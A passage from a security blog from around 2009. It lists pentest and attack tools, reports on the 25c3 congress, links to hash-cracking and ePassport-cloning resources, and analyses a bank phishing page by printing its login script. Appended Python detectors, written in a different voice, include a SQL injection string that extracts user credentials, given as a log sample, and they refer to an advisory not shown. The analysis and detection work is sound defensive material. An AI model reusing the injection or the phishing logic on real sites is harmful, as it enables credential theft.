of scanned daemons<br />• Unicornscan: a information gathering and correlation engine<br />• DMitry (Deepmagic Information Gathering Tool): a host information gathering tool for *nix systems<br />• Athena: a search engine query tool for passive information gathering<br /><br /><span style="font-weight: bold;">Security Scanner:</span><br />• Nessus - In version 2 an OpenSource network scanner. Version 3 is only available in binary form and under a proprietary license.<br />• OpenVAS: a fork of Nessus 2.2.5 (formerly known as GNessUs)<br />• Nessj: a java based nessus (and compatibles) client (formerly known as Reason)<br />• Paul Clip from @stake released AUSTIN, a security scanner for Palm OS 3.5+.<br /><br /><span style="font-weight: bold;">Webserver:</span><br />• Nikto: a web server scanner with anti IDS features. Based on Rain Forest Puppies libwhisker library.<br />• Wikto: a webserver assessment tool (Windows only; requires .NET framework)<br />• WSDigger: a black box web pen testing tool from Foundstone (Windows based)<br />• Metis: a java based information gathering tool for web sites<br /><br /><span style="font-weight: bold;">Fingerprinting:</span><br />• SinFP: a fingerprinting tool which requires only an open tcp port and sends maximum 3 packets<br />• Winfingerprint: much more than a simple fingerprinting tool.It scans for Windows shares, enumerates usernames, groups, sids and much more.<br />• p0f 2: Michal Zalewski announced his new release of p0f 2, a passive OS fingerprinting tool. p0f 2 is a completely rewrite of the old p0f code.<br />• xprobe2: a remote active operating system fingerprinting tool from Ofir Arkin and the xprobe2 team<br />• Cron-OS: an active OS fingerprinting tool based on TCP timeout behavior. 
This project was formerly known as "RING" and is now published as a nmap addon.<br />Proxy Server:<br />• Burp proxy: an interactive HTTP/S proxy server for attacking and debugging web-enabled applications<br />• Screen-scraper: a http/https-proxy server with a scripting engine for data manipulation and searching<br />• Paros: a man-in-the-middle proxy and application vulnerability scanner<br />• WebScarab: a framework for analyzing web applications. One of it's basic functionality is the usage as intercepting proxy.<br /><br /><span style="font-weight: bold;">War Dialers:</span><br />• IWar: a classic war dialer, now also with VOIP (IAX2) support. One of a few wardialers for *nix operation systems, and the only with VOIP functionality (to my knowledge)<br />• THC-Scan: a war dialer for DOS, Windows and DOS emulators<br />Malware / Exploit Collections:<br />• packetstormsecurity.org: Huge collections of tools and exploits<br />• ElseNot Project: The project tries to publish an exploit for each MS Security Bulltin. A script kiddie dream come true.<br />• Offensive Computing: Another malware collection site<br />• Securityforest: try the ExploitTree to get a collection of exploit code; have a look at the ToolTree for a huge list of pentest stuff<br /><br /><span style="font-weight: bold;">Databases / SQL:</span><br />• sqlninja: a tool to exploit sql injection vulnerabilities in web applications with MS SQL Servers (alpha stage)<br />• CIS Oracle Database Scoring Tool: scans Oracle 8i for compliance with the CIS Oracle Database Benchmark<br />• SQLRecon: an active and passive scanner for MSSQL server. 
Works on Windows 2000, XP and 2003.<br />• absinthe: a gui-based tool that automates the process of downloading the schema & contents of a database that is vulnerable to Blind SQL Injection (see here and here).<br />• SQL Power Injector: a GUI based SQL injector for web pages (Windows, .Net Framework 1.1 required, Internet Explorer 5.0+ required)<br />Voice over IP (VOIP):<br />• vomit (voice over misconfigured internet telephones): converts Cisco IP phone conversations into wave files<br />• SiVuS: a VOIP vulnerability scanner - SIP protocol (beta, Windows only)<br />• Cain & Abel: mostly a password cracker, can also record VOIP conversations (Windows only)<br />• sipsak (SIP swis army knife): a SIP packet generator<br />• SIPp: a SIP test tool and packet generator<br />• Nastysip: a SIP bogus message generator<br />• voipong: dumps G711 encoded VOIP communications to wave files. Supports: SIP, H323, Cisco Skinny Client Protocol, RTP and RTCP<br />• Perl based tools by Thomas Skora: sip-scan, sip-kill, sip-redirectrtp, rtpproxy and ipq_rules<br />• rtptools: a toolset for rtp recording and playing<br /><br /><span style="font-weight: bold;">Networkbased Tools:</span><br />• yersinia: a network tool designed to take advantage of some weakeness in different network protocols (STP, CDP, DTP, DHCP, HSRP, 802.1q, VTP)<br />• Netsed: alters content of network packets while forwarding the packets<br />• ip6sic: a IPv6 stack integrity tester<br /><br /><span style="font-weight: bold;">VPN:</span><br />• ike-scan: an IPSec enumeration and fingerprinting tool<br />• ikeprobe: ike scanning tool<br />• ipsectrace: a tool for profiling ipsec traffic in a dump file. Initial alpha release<br />• VPNMonitor: a Java application to observer network traffic. It graphically represents network connections and highlights all VPN connections. 
Nice for demonstrations, if somewhat of limited use in a real pen test.<br />• IKECrack:an IKE/IPSec cracker for pre-shared keys (in aggressive mode authentication [RFC2409])<br />DNSA: DNS Auditing tool by Pierre Betouin<br /><br /><span style="font-weight: bold;">A little more:</span><br />Hunt: a session hijacking tool with curses GUI<br />SMAC: a Windows MAC Address Modifying Utility. Supports Windows 2000 and XP.<br />The WebGoat Project: a web application written in Java with intentional vulnerabilities. Supports an interactive learning environment with individual lessons.<br />TSCrack: a Windows Terminal Server brute forcer<br />Ollie Whitehouse from @stake released some new cellular phone based pentesting tools for scanning (NetScan, MobilePenTester). All tools require a Sony Ericsson P800 mobile phone. Unfortunately, @stake seems no longer to support much of their free security tools. So, use instead the alternativ download links above.<br />THC-FuzzyFingerprint: generates fuzzy fingerprints that look almost nearly equal to a given fingerprint/hash-sum. Very useful for MITM attacks.<br />BeatLM, a password finder for LM/NTLM hashes. Currently, there is no support for NTLM2 hashes. In order to get the hashes from network traffic, try ScoopLM.<br />THC vlogger: a linux kernel based keylogger<br />The Metasploit Framework: an "advanced open-source platform for developing, testing, and using exploit code".<br />ATK (Attack Tool Kit): a comination of security scanner and exploit framework (Windows only)<br />Pirana: an exploitation framework to test the security of email content filters. See also the whitepaper<br />PassLoc: a tool which provides the means to locate keys within a buffer. 
Based on the article "Playing hide and seek with stored keys" by Adi Shamir.<br />Dl-Hell: identifies an executables dynamic link library (DLL) files<br />DHCPing: a security tool for testing dhcp security<br />ldapenum: a perl script for enumeration against ldap servers.<br />Checkpwd: a dictionary based password checker for oracle databases<br />NirCmd from NirSoft: a windows command line tool to manipulate the registry, initiate a dialup connection and much more<br />Windows Permission Identifier: a tools for auditing user permissions on a windows system<br />MSNPawn: a toolset for footprinting, profiling and assesment via the MSN Search. Windows-only, .NET required<br />snmpcheck:a tool to gather information via snmp. Works on Linux, *BSD and Windows systems.<br />pwdump6: extract NTLM and LanMan hashes from Windows targets<br /><br />Aprovéchenla, en breve un par más ;-)<br /></span>Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com1tag:blogger.com,1999:blog-7490817570652180312.post-36676990589258462182009-01-08T09:31:00.007-02:002009-01-08T09:46:07.376-02:0025th Chaos Communication CongressThe 25th Chaos Communication Congress is over and again has been a great success. About 5.000 people gathered in the Congress Center in the heart of Berlin. As usual, the event was a great mixture of lectures and workshops; serious and funny things around "hacking". <a href="http://events.ccc.de/congress/2008/">[25c3 wiki]<br></a><div style="text-align: justify;"><br>Down near the "Lounge" was the <span style="font-weight: bold;">Hackcenter</span> with its different projects. 
Here you could build your own quadrocopter <a href="http://www.youtube.com/watch?v=GmTl9CARI7k">[video]</a> <a href="http://events.ccc.de/congress/2008/wiki/Build_a_Quadrocopter">[info]</a>, extend your IXUS camera with additional features like adjustable shutter speed <a href="http://events.ccc.de/congress/2008/wiki/CHDK">[info]</a>, have fun with microcontrollers <a href="http://events.ccc.de/congress/2008/wiki/MicrocontrollerWorkshop">[info]</a> or relax while playing a round of 3D pong <a href="http://www.youtube.com/watch?v=DX8UY2LNLo0">[video]</a> in the blinkenarea. A complete list of all projects held at the 25c3 can be found <a href="http://events.ccc.de/congress/2008/wiki/Category:Projects">here</a>.<br /><br /><b>Dan Kaminsky</b>'s talk about DNS was very interesting, although there was nothing really new. Basically it was a summary with the most relevant information around the DNS bug which was published this year. <a href="ftp://ftp.ccc.de/congress/25c3/video_h264_720x576/25c3-2906-en-why_were_we_so_vulnerable_to_the_dns_vulnerability.mp4">[video]</a><br /><br /><b>Jacob Appelbaum</b> not only had his lecture about the Cold Boot Attacks <a href="http://events.ccc.de/congress/2008/Fahrplan/events/2922.en.html">[info]</a>, but with <b>Alexander Sotirov</b> and his crew he also held the famous talk about creating a malicious root CA based on an MD5 collision attack. <a href="http://blog.s21sec.com/2008/12/siguen-sin-ser-preocupantes-las.html">[S21sec blog]</a> <a href="http://www.phreedom.org/research/rogue-ca/md5-collisions-1.0.ppt">[slides]</a> <a href="ftp://ftp.ccc.de/congress/25c3/video_h264_720x576/25c3-3023-en-making_the_theoretical_possible.mp4">[video]</a> <a href="http://www.phreedom.org/research/rogue-ca/">[info]</a><br /><br /><b>Thorsten Holz</b> spoke about their attempt to analyze banking malware and find the related C&C servers in an automated way. Among other things they improved and extended <a href="http://www.cwsandbox.org/">www.cwsandbox.org</a>, a binary analyzer like virustotal.com, to be able to simulate user interaction in order to behave like a human and e.g. enter credentials into sensitive web sites. They also managed to find and identify lots of "Dropzones", including full access to some of them. With statistical information about the data gathered over the last seven months he finished this very interesting talk. <a href="http://honeyblog.org/junkyard/presentations/banking-trojans-25C3-web.pdf">[slides]</a> <a href="http://honeyblog.org/junkyard/reports/impersonation-attacks-TR.pdf">[info]</a><br /><br /><b>Felix Lindner</b> aka FX had a very interesting speech about a new generation of Cisco exploits. His attempt was to find a generic and version-independent way of exploiting Cisco routers. <a href="http://www.phenoelit-us.org/stuff/FX_Phenoelit_25c3_Cisco_IOS.pdf">[slides]</a><br /><br />These have only been some of my personal favorites; you can find an overview of all the talks at the following links. Some, but not all, of the slides and videos are published yet. If audio is enough for you, there you'll find a few more. <a href="http://events.ccc.de/congress/2008/Fahrplan/events.en.html">[talks]</a> <a href="http://events.ccc.de/congress/2008/wiki/Proceedings">[slides]</a> <a href="http://events.ccc.de/congress/2008/wiki/Conference_Recordings">[videos]</a> <a href="ftp://ftp.ccc.de/congress/25c3/audio_only/">[audio]</a><br /><br />Let's see if the coming 26c3 congress will again be placed in Berlin's Congress Center, since it was quite overcrowded and hard to get into some of the lectures.<br /><br />Finally, here you have some random and related links: <a href="http://flickr.com/search/?q=25c3&w=all">[flickr]</a> <a href="http://www.youtube.com/results?search_query=25c3&search_type=&aq=f">[youtube]</a> <a href="http://tinyurl.com/8hu44h">[Dan Kaminsky's Pics]</a><br /></div><br /><i>Clemens Kurtenbach</i><br /><i>S21sec e-crime</i><br /><br /><b>Source: <a href="http://blog.s21sec.com/2009/01/chaos-communication-congress-25c3.html">s21sec</a></b><br /><br />Ariel M. Liguori de Gottig<br /><br /><b>Security in Web Application Sessions</b> (2009-01-07)<br /><a href="http://blog.s21sec.com/">s21sec</a> has launched a series of notes on security in web application sessions. They really contain very complete information; they are currently on the third installment, which is why I recommend them!
Don't miss it!<br /><br /><a href="http://blog.s21sec.com/2008/12/seguridad-en-las-sesiones-de-las.html">Security in Web Application Sessions I</a><br /><a href="http://blog.s21sec.com/2008/12/seguridad-en-las-sesiones-de-las_31.html">Security in Web Application Sessions II</a><br /><a href="http://blog.s21sec.com/2009/01/seguridad-en-las-sesiones-de-las.html">Security in Web Application Sessions III</a><br /><br />Regards,<br />Ariel M. Liguori de Gottig<br /><br /><b>Cryptographic Hash Algorithm Competition</b> (2009-01-07)<br />In case many of you didn't know, a competition is under way to select the new hash algorithm, which will be called SHA-3. In the first round, 51 of the initial 64 entrants remain, and the analysis of the remaining algorithms is still ongoing.<br />On <a href="http://ehash.iaik.tugraz.at/wiki/The_SHA-3_Zoo">this page</a> you can see which of the algorithms have already been broken and the technique used to do it (in another post we will detail what each method means).<br />We'll see who comes out victorious!<br /><br />More information at:<br /><ul><li><a href="http://en.wikipedia.org/wiki/SHA-3">Wikipedia</a></li><li><a href="http://csrc.nist.gov/groups/ST/hash/sha-3/Round1/index.html">NIST (<i>National Institute of Standards and Technology</i>)</a></li><li><a href="http://blog.s21sec.com/2009/01/sha-3-y-algunos-conceptos.html">s21sec</a></li></ul>Ariel M. Liguori de Gottig<br /><br /><b>Getting a password from an MD5 hash</b> (2009-01-07)<br />Surely everyone has heard of the MD5 hash algorithm, since it is used very widely every day. That is why it will be of interest to learn the password behind a hash produced with this algorithm, and so here I recommend a page where a great many precomputed values are already hosted: <a href="http://www.passcracking.com./index.php">PassCracking.ru</a>. I hope it helps ;)<br /><br />Regards,<br />Ariel M. Liguori de Gottig<br /><br /><b>The Official Nmap Project Guide to Network Discovery and Security Scanning</b> (2009-01-05)<br />As you may know (though some may not have heard), this practical book by Fyodor is on its way; its purpose is to introduce us to the magnificent world of Nmap, which to my taste is one of the best tools ever designed. Many of you must already know it, and if not, I don't know what you are waiting for to go to the <a href="http://nmap.org/download.html">download section</a>.<br />You can read the first half of the book on the Nmap site, in the <a href="http://nmap.org/book/toc.html">book section</a> ;).<br /><br />Regards,<br />Ariel M.
Liguori de Gottig<br /><br /><b>Predictions for 2009</b> (2009-01-02)<br />Our friends at <a href="http://taosecurity.blogspot.com">TaoSecurity</a> have put together their own "predictions" for this 2009, which is starting with a bang.<br /><ol style="font-style: italic;"><li><b>Expect greater government involvement in assessing the security of private sector networks.</b> I wasn't inventing this a year ago, and I'm not inventing it now. I'm extrapolating from a trend line. My post <a href="http://taosecurity.blogspot.com/2008/12/letters-you-will-need-to-know-201-cmr.html">Letters You Will Need to Know: 201 CMR 17.00</a> is just the latest example of increasingly aggressive government involvement in private sector security matters.</li><li><b>Expect to start learning about IPv6, or be confused quickly.</b> 2009 is not the year of IPv6, but we're getting there. The US Department of Defense is already grappling with IPv6, despite the compliance charade of mid-2008. Wider adoption of Microsoft Vista and its tunnel mechanisms, along with IPv6-active consumer devices, are driving IPv6 in one form or the other into our lives.</li><li><b>Expect at least one cloud security incident to affect something you value.</b> This is not the great <a href="http://www.cloudsecurity.org/">Cloud Security</a> blog, but I know many of us are already depending on cloud services. In 2007 and 2008 we started suffering denial when services suffered problems of availability. Next will be disclosure and then degradation. For more on these terms read <a href="http://taosecurity.blogspot.com/2008/02/first-they-came-for-bandwidth.html">First They Came for Bandwidth...</a></li><li><b>Expect network security to matter again.</b> I may be a little late on this one, given problems we had with DNS, BGP, and even SSL in 2008. I think these sorts of problems demonstrate that there's lots of vulnerability left outside the platform, operating system, and applications. As IPv6 becomes more important this one is going to the top of the list, probably in 2010.</li><li><b>Expect to buy fewer "new" security products.</b> We need to get back to basics by answering the sorts of questions that appeared in my post <a href="http://taosecurity.blogspot.com/2008/11/marcus-ranum-on-network-security.html">Marcus Ranum on Network Security</a>. In tough economic times, managers are not going to spend on new equipment if they still don't know what the stuff you just bought does. Spend more time on consolidation and specialization and less time on looking for the next <a href="http://taosecurity.blogspot.com/2007/11/deflect-silver-bullets.html">security silver bullet</a>.</li></ol>Let's heed what Bejtlich tells us ;)<br /><br />Source: <a href="http://taosecurity.blogspot.com/2009/01/predictions-for-2009.html">TaoSecurity</a><br /><br />Ariel M.
Liguori de Gottig<br /><br /><b>Phishing Analysis: Standard Bank (30/12/2008)</b> (2008-12-30)<br />This morning I received a curious e-mail from Standard Bank SA:<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHuwuGEOUCyDak2ejOpWkDpmor0HWEyhj5HV4Gq6BRZnhvLm-XI_zHvr9GBKJ-9A1haeyJk9iTb2YytPtfs3PhkepK5TkoCCwQjNAeRqHuCRozNnf3oh-63U9NuqBpi25SRQhfkktGiqg/s1600-h/ej_pishing01.jpg"><img style="display:block; margin:0px auto 10px; width: 320px; height: 241px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHuwuGEOUCyDak2ejOpWkDpmor0HWEyhj5HV4Gq6BRZnhvLm-XI_zHvr9GBKJ-9A1haeyJk9iTb2YytPtfs3PhkepK5TkoCCwQjNAeRqHuCRozNnf3oh-63U9NuqBpi25SRQhfkktGiqg/s320/ej_pishing01.jpg" border="0" alt="" /></a><br /><br />Everything looks quite correct; however, nobody believes that Standard Bank needs to verify our details. Apart from that, the link that appears in the e-mail is the correct Standard Bank one, although if you look closely those links take us to other URLs, not the ones they show. Those pages are:<br /><br />http://standardbank.com.ar.webempresas.idkey26914511442100136208.secupends8.cn/ar_pers/ (for individuals)<br /><br />http://standardbank.com.ar.webempresas.idkey2323415925205188159167.secupends8.cn/ar_corp/ (for businesses)<br /><br />We have found something interesting: these don't look like Standard Bank's sites. Let's see whether we find something interesting in them (poking around the source code a little):<br /><pre><code>// Client-side script served by the phishing page, as found in its source.
var dummy = false;
var procesando = false;

function SetCookie (name, value) {
  expireDate = new Date;
  expireDate.setDate(expireDate.getDate()+10);
  document.cookie = name + '=' + value + ';expires=' + expireDate.toGMTString();
}

function GetCookie (name) {
  var arg = name + "=";
  var alen = arg.length;
  var clen = document.cookie.length;
  var i = 0;
  while (i < clen) {
    var j = i + alen;
    if (document.cookie.substring(i, j) == arg)
      return getCookieVal (j);
    i = document.cookie.indexOf(" ", i) + 1;
    if (i == 0) break;
  }
  return null;
}

function getCookieVal(offset) {
  var endstr = document.cookie.indexOf (";", offset);
  if (endstr == -1)
    endstr = document.cookie.length;
  return unescape(document.cookie.substring(offset, endstr));
}

// Form validation mimicking the bank's rules (8-12 alphanumeric user name, 8-character password).
function validateLogin (frmForm) {
  var strInput;
  var strError = '';
  var blnSucess = false;
  var strValidos = '1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';

  with (frmForm) {
    // Validate the user name
    strInput = usuario.value;
    if (strInput.length < 1) {
      strError += 'Debe ingresar el nombre de usuario.\n';
    } else if (strInput.length < 8 || strInput.length > 12) {
      strError += 'El nombre de usuario debe tener ente 8 y 12 caracteres.\n';
    } else {
      strIngr = strInput.split("");
      for (j = 0; (j < strIngr.length); j++) {
        if (strValidos.indexOf(strIngr[j]) == -1) {
          strError += 'Debe ingresar sólo números o letras';
          break;
        }
      }
    }
    // Validate the password
    strInput = password.value;
    if (strInput.length < 1) {
      strError += 'Debe ingresar una clave de acceso.\n';
    } else if (strInput.length < 8 || strInput.length > 8) {
      strError += 'La clave de acceso debe tener 8 caracteres.\n';
    } else {
      strIngr = strInput.split("");
      for (j = 0; (j < strIngr.length); j++) {
        if (strValidos.indexOf(strIngr[j]) == -1) {
          strError += 'Debe ingresar sólo números o letras';
          break;
        }
      }
    }
  }

  if (strError) {
    alert (strError);
    blnSucess = false;
  } else {
    blnSucess = true;
    // Only the first submission goes through; a second click just shows "processing".
    if (dummy == false) {
      dummy = true;
    } else {
      alert ('Aguarde, su transaccion esta siendo procesada . . .');
      blnSucess = false;
    }
  }
  return blnSucess;
}

function validaNavegador() {
  var valida = false;
  if (navigator.appName == "Netscape") {
    if (parseFloat(navigator.appVersion) >= 4.75) {
      // correct version 4.75
      valida = true;
    }
    //return;
  } else {
    var version = new String(navigator.appVersion);
    var i = version.indexOf("MSIE ");
    if (i >= 0) {
      var fVersion = parseFloat(version.substring(i + 5))
      if (fVersion >= 5.5) // correct version 5.5
        valida = true;
      //return;
    }
  }
  if (!valida) {

  } else {
    document.frmLogin.usuario.focus();
  }
}

function load() {
  // document.frmLogin.usuario.focus();
  validaNavegador();
}

// Hands the visitor off to the real bank site.
function KBgo(check, link) {
  if (check.checked == true) {
    this.location.href = "https://www.standardbank.com.ar:443/cgi-bin/preprd.dll/bkb/access.do?" + link + "&kb=s";
  }
}
</code></pre>Well, this speaks for itself: it waits for us to enter our user name and password, captures them and then redirects us to the real Standard Bank page, all typical of a phishing attack; it is the modus operandi found in any book. Be careful and look closely at where you log in; the difference between the pages is nil.<br /><br />Regards,<br />Ariel M. Liguori de Gottig<br /><br /><b>Cloning an ePassport</b> (2008-12-30)<br />Today I read on the fabulous <a href="http://freeworld.thc.org/">THC site</a> a piece published by vonJeek in which he gives us all the information needed to clone <i><b>"our"</b></i> own ePassport. See it here:<br /><br />http://freeworld.thc.org/thc-epassport/<br /><br />Let's hope it doesn't fall into the wrong hands! ;)<br />Regards,<br />Ariel M. Liguori de Gottig
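For the PHP-Fusion vArcade advisory earlier on this page: an added example (my own code, not from the advisory, PHP-Fusion or the vArcade mod) that runs detection logic over constructed web-server access-log lines for the callcomments.php endpoint, flagging a comment_id that is not the plain integer the mod expects and classifying the UNION ... SELECT vector the advisory publishes. The log layout, the sample lines and the double-encoded variant are my assumptions; that variant generalises beyond the single vector on the page.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Endpoint and parameter named in the advisory; "[path]" may precede the endpoint.
VARCADE_PATH = "/infusions/varcade/callcomments.php"
PARAM = "comment_id"

# Common Log Format (constructed assumption about the web server's log layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample: a benign call, the advisory's own vector as it would be logged,
# a double-encoded and comment-obfuscated variant (a generalisation beyond the advisory),
# a non-integer value with no SQL keyword, and an unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Jan/2009:09:10:11 -0200] "GET /infusions/varcade/callcomments.php'
    '?comment_id=42 HTTP/1.1" 200 1834',
    '203.0.113.9 - - [09/Jan/2009:09:12:40 -0200] "GET /fusion/infusions/varcade/callcomments.php'
    '?comment_id=9999%27+union+select+0,user_name,2,3,4,5,6,user_password+from+fusion_users'
    '+where+user_id=1/* HTTP/1.1" 200 2210',
    '203.0.113.9 - - [09/Jan/2009:09:13:02 -0200] "GET /infusions/varcade/callcomments.php'
    '?comment_id=1%2527%2520UNION%2F%2A%2A%2FSELECT%25201 HTTP/1.1" 500 310',
    '198.51.100.2 - - [09/Jan/2009:09:14:00 -0200] "GET /infusions/varcade/callcomments.php'
    '?comment_id=abc HTTP/1.1" 200 120',
    '10.0.0.5 - - [09/Jan/2009:09:15:00 -0200] "GET /news.php?readmore=3 HTTP/1.1" 200 5000',
]


def normalize(value):
    """Undo a second layer of percent/plus encoding, drop /* */ comments and fold
    whitespace and case so that keyword matching sees what the SQL parser would see."""
    v = unquote_plus(unquote_plus(value))
    v = re.sub(r"/\*.*?\*/", " ", v)
    return re.sub(r"\s+", " ", v).lower()


def classify_comment_id(raw):
    """'ok' for the integer a real caller sends, 'union_injection' when a UNION ... SELECT
    is smuggled in (the advisory's technique), 'malformed' for any other non-integer."""
    if raw.isdigit():
        return "ok"
    if re.search(r"\bunion\b.*\bselect\b", normalize(raw)):
        return "union_injection"
    return "malformed"


def scan_log(lines):
    """Return (client_ip, verdict, decoded_comment_id) for each request to the endpoint."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith(VARCADE_PATH):
            continue
        # parse_qs already applies one round of percent/plus decoding.
        for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
            findings.append((m.group("ip"), classify_comment_id(value), value))
    return findings


if __name__ == "__main__":
    # Detection is a compensating control; the fix belongs in the endpoint itself:
    # cast comment_id to an integer server-side (or bind it in a prepared statement).
    for ip, verdict, value in scan_log(SAMPLE_LOG):
        print(f"{ip:14} {verdict:16} comment_id={value!r}")
```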
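For the Standard Bank phishing analysis above: an added example (my own code, not the phishing kit's script nor anything from the bank) that works out which registrable domain really owns each link's host and flags the bank's name appearing only as a decoy subdomain label, using the two redirect URLs quoted in that post and the real login URL from the kit's KBgo(). The small public-suffix table and the link list are constructed assumptions.

```python
from urllib.parse import urlsplit

# Constructed stand-in for the Public Suffix List (assumption: a real tool loads the
# full list from publicsuffix.org; these entries cover the hosts in the post).
PUBLIC_SUFFIXES = {"com", "net", "org", "ar", "com.ar", "cn", "com.cn", "net.cn"}

# The bank's registrable domain, taken from the real login URL in the kit's KBgo().
LEGIT_DOMAIN = "standardbank.com.ar"

# Constructed link list: the two redirect targets quoted in the post and the real
# login URL the kit finally sends the victim to.
MAIL_LINKS = [
    "http://standardbank.com.ar.webempresas.idkey26914511442100136208.secupends8.cn/ar_pers/",
    "http://standardbank.com.ar.webempresas.idkey2323415925205188159167.secupends8.cn/ar_corp/",
    "https://www.standardbank.com.ar:443/cgi-bin/preprd.dll/bkb/access.do?kb=s",
]


def registrable_domain(host):
    """Return the public suffix plus one label ('secupends8.cn'), or None if the host
    is itself a suffix or matches no known suffix. The first hit while scanning from
    the left is the longest matching suffix, which is the rule the PSL uses."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[i - 1:]) if i > 0 else None
    return None


def classify_link(url, legit=LEGIT_DOMAIN):
    """Judge one URL: who really owns the host, and whether the bank's name is only
    being used as a decoy among the left-hand labels."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower().rstrip(".")
    owner = registrable_domain(host)
    brand = legit.split(".")[0]          # 'standardbank'
    if owner == legit:
        verdict = "legitimate"
    elif brand in host.split("."):
        verdict = "lookalike"             # e.g. standardbank.com.ar.<...>.secupends8.cn
    else:
        verdict = "unrelated"
    return {"url": url, "host": host, "registrable_domain": owner,
            "https": parts.scheme.lower() == "https", "verdict": verdict}


def triage(urls):
    """Classify every link found in a message."""
    return [classify_link(u) for u in urls]


if __name__ == "__main__":
    for r in triage(MAIL_LINKS):
        print(f"{r['verdict']:10} https={r['https']!s:5} owner={r['registrable_domain']}  {r['url']}")
```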